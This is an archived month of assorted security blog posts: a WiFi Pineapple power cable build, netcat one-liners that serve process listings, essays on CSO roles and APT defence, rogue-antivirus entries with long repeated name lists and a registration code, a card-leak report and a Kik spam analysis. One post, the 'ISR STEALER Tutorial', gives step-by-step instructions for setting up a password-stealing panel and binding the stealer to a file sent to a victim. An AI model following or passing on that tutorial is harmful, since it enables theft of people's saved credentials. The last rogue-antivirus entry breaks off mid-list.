Monthly Archives: March 2014

USB Power Cable for the Pineapple Mark V

Preface

This quick blog post is about my weekend project from last Saturday. To start with I have bought a Pineapple Mark V from the hak5 shop. The Wi-Fi Pineapple is a special Wi-Fi access point, designed for wireless network auditing with custom, purpose built hardware and software with the capability for extensions. You could make something like this on your own, but the Pineapple has everything pre-configured, so it makes a pentester's life a lot easier.

The basic problem was that the "standard" version of the Pineapple Mark V ships with a wall plug only. When you perform a wireless or mobile pentest, usually you do not have the luxury to have a wall plug, so either you will need a battery package or feed your cure little Pineapple from you laptop.

I have ordered a Pineapple Juice 6800, but the one I got is not charging and even the replacement one I got from the hakshop (big up to the hak5 guys for that one!) does not work either :( (I will try to fix at least one of them later). The USB power cable that you can buy from the hakshop is currently out of stock, but don't be sad, cause it won't work whit the Mark V anyway, as the Mark V need "DC in Variable 5-12V, ~1A" for input while for USB the supplied output by a host (for example a common laptop USB port) is usually around 5V at 500mA (so 0.5A).

The voltage level will not be a problem with a  USB cable (although I am not sure how well for example a USB flash drive would work when you power the Mark V from USB... something I have to test in the future) the current level will not be enough to power the Pineapple. Luckily, Kirchhoff's first law tells us that if we connect 2 wires with 0.5Amps, than the wire leaving the junction should have 1A, which is exactly what we need. :)

The problem is that it is not easy to find a cable with USB Y connector to DC barrel connector, so I took a USB Y cable for a USB 3.0 external HDD, and a USB power cable with a DC barrel connector, and soldered them together to give enough power for my dear little Pineapple Mark V.

Parts Needed

  • A USB Y cable, so the one with two USB connectors at one end and whatever on the other end. Usually external HDD cables are like this, to ensure that you support enough juice for the HDD from the USB port.
  • A cable with a DC barrel 2.1mm ID / 5.5mm OD, center positive connector on one and whatever on the other end :) For example, I got this USB cable from Amazon.
  • Some heat sink tube in order to give a nice look to your final product. You can buy a nice heat sink kit from Sparkfun for example.

Tools needed

  • Flush/diagonal cutters (for cutting the wires)
  • Solder (for soldering, of course)
  • Soldering iron (yep, this one is also for soldering)
  • Hot air solder station (for the heat sink tubes)
  • Third hand with Magnifying Glass (you're gonna need it, otherwise you will have to grow a third hand :) )
  • Good light (no, seriously, this is really important when you solder something!)

Assembly

As soldering wires together is not rocket science, I will basically use the pictures I took to explain what you will have to do.

So here I have my USB Y cable for a USB 3.0 external HDD:


You will have to cut the wire into half, as we need the USB Y end of it. Wires in a USB cable should be color coded, for the USB 2.0 wires, these are: red = VCC, white = D-, green = D+ and black = GND. More on the USB pinouts here.


For me, as I used a USB 3.0 cable, there were two extra shielded twisted pairs:


These are the USB 3.0 additional data cables, also color coded (pinouts here and here), but we won't need them, so never mind these:


Next, my USB power cable with a DC barrel connector:


Nothing magical here, again, we only need the red and black (VCC and GND) wires and this time the DC barrel connector end of the cable:


Before soldering, it is a good idea to test the concept and see if it works:


Looks OK. Now to make a nicely looking cable, I used heat sink tubes, but if you don't care about the looks, you can use insulating tape too:


One final check after the soldering but before the heat sink tubes:


Again, looking good, so first small heat sinks for the wires:


And a heat sink for the cable:


The final test. Works perfectly! (if you are wondering, the keyboard layout is Hungarian...)


Conclusion

The whole process takes about 30-40 mins and requires minimal soldering skills, so you really have no excuse not  to do it yourself if you want to power your Pineapple Mark V from USB and like I wrote at the beginning, you don't really have other option as you cannot find such a cable out there.

Episode #176: Step Up to the WMIC

Tim grabs the mic:

Michael Behan writes in:

Perhaps you guys can make this one better. Haven’t put a ton of thought into it:

C:\> (echo HTTP/1.0 200 OK & wmic process list full /format:htable) | nc -l -p 3000

Then visit http://127.0.0.1:3000

This could of course be used to generate a lot more HTML reports via wmic that are quick to save from the browser. The downside is that in its current state is that the page can only be visited once. Adding something like /every:5 just pollutes the web page with mostly duplicate output.

Assuming you already have netcat (nc.exe) on the system the command above will work fine, but it will only work once. After the browser recieves the data the connection has been used and the command is done. To do this multiple times you must wrap it in an infinite For loop.

C:\> for /L %i in (1, 0, 2) do (echo HTTP/1.0 200 OK & wmic process list full /format:htable) | nc -l -p 3000

This will count from 1 to 2 and count by 0, which will never happen (except for very large values of 0). We could use the wmic command to request this information from the remote machine and view it in our browser. This method will authenticate to the remote machine instead of allowing anyone to access the information.

C:\> wmic /node:joelaptop process list full /format:htable > joelaptopprocesses.html && start joelaptopprocesses.html

This will use your current credentials to authenticate to the remote machine, request the remote process in html format, save it to a file, and finally open the file in your default viewer (likely your browser). If you need to use separate credentials you can specify /user:myusername and /password:myP@assw0rd.

Hal, your turn, and I want to see this in nice HTML format. :)

Hal throws up some jazz hands:

Wow. Tim seems a little grumpy. Maybe it's because he can make a simple web server on the command line but has no way to actually request data from it via the command line. Don't worry Little Tim, maybe someday...

Heck, maybe Tim's grumpy because of the dumb way he has to code infinite loops in CMD.EXE. This is a lot easier:

$ while :; do ps -ef | nc -l 3000; done

Frankly, most browsers will interpret this as "text/plain" by default and display the output correctly.

But the above loop got me thinking that we could actually stack multiple commands in sequence:

while :; do
ps -ef | nc -l 3000
netstat -anp | nc -l 3000
df -h | nc -l 3000
...
done

Each connection will return the output of a different command until you eventually exhaust the list and start all over again with the first command.

OK, now let's deal with grumpy Tim's request for "nice HTML format". Nothing could be easier, my friends:

$ while :; do (echo '<pre>'; ps -ef; echo '</pre>') | nc -l 3000; done

Hey, it's accepted by every major browser I tested it with! And that's the way we do it downtown... (Hal drops the mic)

CIO vs CSO: Allies or Enemies


Whenever a breach occurs it reveals weaknesses in how an organization approached security.  Compromises are a great way to reveal the hidden sins organizations are committing.  In the case of the Target breach, it is a gift that keeps on giving.  While the initial breach report came out in December, it seems every week there are new “interesting” details that are revealed.  One of the more recent items is the fact that Target did not have a CSO and all security responsibilities were buried under the CIO.

The first question that people ask is whether the CIO should have been held responsible for the breach.  The bottom line is when a major event like this occurs; someone needs to be held responsible for the negligence.  Therefore it is not surprising that someone was blamed for the breach.  What was surprising is that security was a responsibility of the CIO.  The fact that a large organization did not have a separate CSO that is a peer with the CIO, is what is most concerning about the story.  Clearly many things went wrong during the breach and whoever had the responsibility of security needs to be held accountable.  However, it was not fair that the executives structured the company in this manner.  Running the IT infrastructure (typically a role of the CIO) and protecting the information (typically a role of the CSO) are two different roles and it is unfair to have one person expected to do both effectively.  These roles while at times can be complementary, they are often at odds.  Having security buried under the CIO, puts that person in a conflict of interest situation.

First and foremost, organizations of any size, especially one the size of Target needs to have an executive that is responsible for security.  With the large interdependence organizations have on a digital infrastructure, security needs to have a seat at the table in the boardroom.  If security gets buried under IT, whose primary responsibility is running a reliable infrastructure, bad decisions will be made and breaches will happen. 

Not having a CSO today is like a football team not having a quarterback.  You can have the best playbook in the world, but if you do not have someone on the field calling the plays, you are not going to win many games.  In order for organizations to be successful, they must have a reliable infrastructure and proper protection of information.  If an organization only has a CIO and no CSO, no one is focusing in on security and the results are pretty obvious.  If there is no one focusing in on security, bad things will happen.  Lack of a CSO, means lack of security.  It is almost a guarantee that Target had an amazing security team and they were screaming and yelling about all of the security issues, but there was no advocate who was listening to them and fighting their cause with the executives.  From the engineers, their needs to be a communication path to the CEO and the CSO is that channel.  Without a CSO, the proper security communication does not make it to the executives.  Therefore if the executives received the proper information about security, my guess is they would have made different decisions and this story would potentially have a happy ending.

The CIO and CSO need to be peers.  IT and security need to have equal representation in the board room, making sure the executives have accurate information.  Typically the CIO will report to the COO and the CSO will report to CFO.  The COO and CFO directly report to the executive.  However an organization decides to structure it, the CIO and CSO must have a different reporting structure.

In order for the CIO and CSO’s to have an effective working relationship, they must have clear boundaries of responsibility.  Typically what works best is for the CSO to define the proper level of security, the CIO to implement the security and the auditor to validate that the security is being done correctly.  The security that is defined by the CSO should be based off of metrics that are used as a reporting structure to the executives, so they can understand the proper level of risk to accept for the organization.  Metrics based security is key to success.  With metrics there are clear guidelines of what must be done and an easy way to measure compliance.

Organizations in this day and age must have a CSO.  Every day that passes, with more breaches becoming public, it becomes easy to convince the executives that they need a CSO.  The problem is many CIO’s do not want to have a CSO, because it is easier for them to accomplish their jobs if they control all aspects of the IT infrastructure.  Therefore the CIO will not usually lobby for a CSO.  There needs to be another advocate convincing the CEO.  The simple question to sell the CEO is “are you comfortable with the level of security at your organization and are you receiving the proper security metrics to make the decisions?”  The problem today is many CEO’s want to create a position of a CSO, but the CIO convinces them they do not need one.  While they have good intentions, it is often the CIO that lobbies against a CSO, since a CSO will cause them to give up control and potentially make their job more difficult.  For example, when a CSO comes in they often disclose all of the security problems, which show that security was not being properly addressed within the organization.

Defending Against the APT


Advanced Persistent Threat (APT)

Introduction
APT, formerly known as the Advanced Persistent Threat, is the buzz word that everyone is using. Companies are concerned about it, the government is being compromised by it and consultants are using it in every presentation they give.   One of the main reasons organizations are broken into today is because they are fixing the wrong vulnerabilities.  If you fix the threats of 3 years ago, you will lose.  APT allows organizations to focus on the real threats that exist today.

While APT is important, we need to clear the smoke and hype, focusing on why it is important and what it means to you.  Instead of just using it as a buzz word, if we understand the core components of APT, we can use it to improve our security.  In APT, threat drives the risk calculation.  Only by understanding the offensive threat will an organization be able to fix the appropriate vulnerabilities. 

What is APT?
APT is the new way attackers are breaking into systems.  APT is a sophisticated, mercurial way that advanced attackers can break into systems, not get caught, keeping long-term access to exfiltrate data at will.  The following are the important things to remember:

1)      APT focuses on any organization, both government and non-government organizations.  Some people make the mistake of thinking that the APT is only focused on Department of Defense (DoD) sites.  When it comes to the Internet the lines between government and commercial are blurring and anything that could cause harm to a country will be targeted.

2)      While the threat is advanced once it gets into a network, the entry point with many attacks is focusing on convincing a user to click on a link.  However, once the APT breaks into a system, it is very sophisticated in what it does and how it works.  Signature analysis will be ineffective in protecting against it.  Advanced attacks are always changing, recompiling on the fly and utilizing encryption to avoid detection.

3)      Many organizations make the mistake of thinking of attacks like the weather.  There will be some stormy days and there will be some sunny days.  However, on the Internet you are always in a storm.  In the past, attackers would periodically attack an organization.  Today attacks are nonstop.  The attackers are persistent, and if an organization lets their guard down for any period of time, the chance of a compromise is very high.

4)      Attackers want to take advantage of economy of scales and break into as many sites as possible as quickly as possible.  Therefore the tool of choice of an attacker is automation.  Automation is not only what causes the persistent nature of the threat, but it is also what allows attackers to break into sites very quickly.

5)      Old school attacks were about giving the victim some visible indication of a compromise.  Today it is all about not getting caught.  Stealth and being covert are the main goals of today’s attacks.  APT‘s goal is to look as close {if not identical} to legitimate traffic.  The difference is so minor that many security devices cannot differentiate between them.

6)      The driver of APT is to provide some significant benefit to the attacker, the benefit being either economic or financial gain.  Therefore the focus will be all about the data.  Anything that has value to an organization means it will have value to an attacker.  Since data has become so portable, and with cloud computing increasing in popularity, data is now available from the Internet, via many sources.

7)      Attackers do not just want to get in and leave, they want long term access.  If someone is going to spend effort breaking into a site, they will make sure they can keep that access for a long period of time.  Stealing data once has value, but stealing data for 9 months gives the attacker even more payoff.

Putting all of this together means that you will be constantly attacked and compromised, making it necessary for an organization to always be in battle mode.  This is a never ending battle.  Since the APT is meant to be extremely stealthy, there is a good chance that an organization might be compromised and not know about it for several months.  Before you discount this, if you were compromised and the attacker was not doing any visible damage, how would you know? 

How to Defend Against the APT?
Prevention is ideal, but detection is a must.  Most organizations focus solely on preventive measures but the problem with the APT is that it enters a network and looks just like legitimate traffic and users.  Therefore, there is little to prevent.  Only after the packets are in the network do they start doing harm and breaking in.

Based on the new threat vectors of the APT, the following are key things organizations can do to prevent against the threat:

1)      Control the user and raise awareness – the general rule is you cannot stop stupid, but you can control stupid.  Many threats enter a network by tricking the user into clicking a link that they shouldn’t.  Limiting the actions a user are allowed to do with proper awareness sessions can go a long way to reduce the overall exposure.

2)      Perform reputation ranking on behavior – traditional security tries to go in and classify something either as good or bad, allow or block.  However with advanced attacks, this classification does not scale.  Many attackers start off looking like legitimate traffic, which means they would be allowed into the network, and then once they are in they turn bad.  Therefore, since the goal of attackers is to blend in, you need to track what the behavior is and rank the confidence level of whether it is looking more like a legitimate user or more like evil.

3)      Focus on outbound traffic – Inbound traffic is often what is used to prevent and stop attackers from entering a network.  While it will catch some attacks and is still important to do, with the APT it is the outbound traffic that is more damaging.  If the intent is to stop exfiltration of data and information, looking at the outbound traffic is how you detect anomalous behavior, which is tied to damage to an organization. 

4)      Understand the changing threat – it is hard to defend against something you do not know about.  Therefore, the only way to be good at the defense is to understand and know how the offense operates.  If organizations do not continue to understand the new techniques and tactics of the attackers, they will not be able to effectively tune their defensive measures to work correctly.

5)      Manage the endpoint – while attackers might break into a network as the entry point, they ultimately want to steal information that exists on endpoints.  If you want to limit the damage, controlling and locking down the endpoint will go a long way to protect an organization.

While the current threat is advanced, persistent, stealthy, and data focused, organizations can implement effective measures to protect their sites.

Summary
APT is only going to increase in intensity over the next year, not go away.  Ignoring this problem just means there will be harm caused to your organization.  The key theme of dealing with APT is “Know thy system/network.”  The more an organization can understand about network traffic and services, the better they can spot/identify anomalies through clipping levels, which is the better way to defend against the APT.  The ultimate way to make sure an organization is properly protected is to run simulated attacks (i.e. penetration testing, red teaming, ethical hacking) and see how vulnerable an organization is, and most importantly how quickly you detected it.  The key to making this successful is to 1) always get explicit approval 2) run benign attacks 3) make sure the people running the test are of equal expertise to the true attacker; and 4) fix any vulnerabilities in a timely manner.  The good news is, by focusing in on understanding the threats and an organization’s vulnerabilities, you can properly defend against the APT. 

Windows AntiBreach Patrol

Windows AntiBreach Patrol is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Antivirus Patrol, Windows Pro Defence Kit, Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Windows Antivirus Patrol

Windows Antivirus Patrol is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Pro Defence Kit, Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Dedicated to all the hackers – Pho3nix (Roulette Cinese)

We finally concluded the Hacker Visual Contest through which we collected videoclips and artwork from the hacker world which we used to assemble the official videoclip for the song &quot;Pho3nix&quot; (Roulette Cinese) dedicated to the hacker world.&nbsp; I feel obliged to thank all of the participants, credits are added at the end of the clip with a special mention to Christan Milani for the outstanding remix, to Roberto &quot;SyS64738&quot; Preatoni for promoting the idea throughout the hacker world and to Gianluca Zenone aka Alex Dreiser for the videoclip realization.

Potential 7 Million Credit Card Details Leaked

UPDATE: Based on further analysis along with discussions with journalists, it appears that this credit card dump contains valid, but older card data that had been previously disclosed. To date, there is no solid evidence this represents a new breach.

The last couple of weeks have seen tensions rising between Russia and Ukraine, and along with it an increase in computer crime.

Sometime earlier this morning, a post allegedly by Anonymous Ukraine has claimed to have published “more than 800 million credit cards” by releasing four archives: Visa, Mastercard, American Express, and Discover cards. Based on the initial analysis by Risk Based Security, the number appears to come to a total of 955,579 cards.

While such an attack does not appear to be directly related to the political strife between Ukraine and Russia, it does raise significant issues for card processors and consumers if the leak is legitimate.

Anonymous Ukraine has posted a short message to Pastebin that includes the following:

Today we publish the first part of our exposure of the international financial system Visa, MC, Discover & Amex, enslaved people around the world. More than 800 million credit cards. Over a trillion dollars.

Each of the four archives appear to have valid card numbers, bank routing numbers, and full names. The dump of information does not contain the credit card CCV (Card Verification Value) or card expiry information. Without this information, committing fraud with the leaked information may be more difficult.

At this time, there is no indication where the data comes from or if it is from a single source or multiple. Risk Based Security and the DatalossDB project will continue to examine the data and investigate in hopes of determining more information about the breach.

Update 7:40P EST – In addition to the 1 million cards disclosed earlier, Anonymous Ukraine has followed up with an additional leak of over 6 million more cards announced in a Tweet. Initial analysis of the new dump by RBS shows 6,064,823 new cards. That breaks down to 668,279 American Express, 3,255,663 Visa, 1,778,749 Mastercard, and 362,132 Discover. Counting the disclosure earlier today and the subsequent dump, the grand total now sits at 7,020,402. Upon cursory examination, a majority of cards seem to come from United States banks. Among the information released, approximately 4,000 come with full user data including social security number, credit card, card card expiry, name, pins, floats, dates of birth, states, and zip codes. The new Pastebin dump from the group also suggests the data may come from ATMs or POS systems.

Spammers Abuse KiK for Survey Revenue

Recently I discovered a spam campaign that utilises the popular messaging service kik to monetize the spammers efforts.

As you can see the message was sent by the unofficial kik account (upon creating a account you automatically add the official account) and is asking you to visit a unknown website. Two warning signs that should scream at you not to visit. 

So what does this campaign do? Firstly, the front page at kikgift(.)com asks for your username. This servers two purposes. This adds a sense of reality to the website and secondly it can be used to asses how well the message gets clicked.Commonly called a call back rate.

Secondly, after you enter your username the website checks if you're visiting on iOS or android and shows appropriate pages asking for you to download a app. 



It is currently unconfirmed if the android ad pages lead to malware hosting app markets. 

The Official KiK team has received a full report regarding this scam site 

Windows Pro Defence Kit

Windows Pro Defence Kit is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

ISR STEALER Tutorial

ISR STEALER - STEAL PASSWORDS BY JUST SITTING AT HOME


HACK BROWSER SAVED PASSWORDS ----------







Guys This is a very Interesting tutorial on HOW TO HACK THE BROWSER SAVED PASSWORDS, Actually this tutorial is mostly for GIRLS who save their passwords in browser huhhh GIRLS r just GIRLS LOLZ..... So, not to waste the time let's begin with our tutorial:
 
Download the Requirements 
 ISR stealer 0.4.1

note : This is stealer , so just need to turn off antivirus . Use at your own risk !
 

Step 1. Login account on 000webhost.com and go to Cpanel






Step 2. Go to MySQl database


Step 3. Create database


Step 4. Fill the database info. in config.php file




Step 5. set username and password for shell account... Step 6. create the .zip file of all the php files...




Step 7. upload the php.zip in 000webhost...

















Step 8. then click the url of the 000 and /install.php


Step 9. click on install icon... Step 10. After successfully installing the files delete the install.php from
    public_html...


Step 11. Copy the url link and go to ISR folder.


Step 12. click on ISR and paste the url of 000/index.php





Step 13. click on test php....it shows Done, check ur logs..


Step 14. now build server.. it will create the server.....


Step 15 Bind the server with any of the file and send it to the victim.....  

Now to check the logs just login into your account and PROOF MY PROGRESS




ACTUALLY THERE ARE NO PASSWORDS IN MY BROWSER SO I AM SAVED BUT I ''ll PROMISE YOU GUYS THAT IF YOU STORE PASSWORDS IN YOUR BROWSERS YO CAN BE HACKED IN A MINUTES.......

THANX FOR FOR YOUR SUPPORT GUYS

Windows Security Master

Windows Security Master is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, 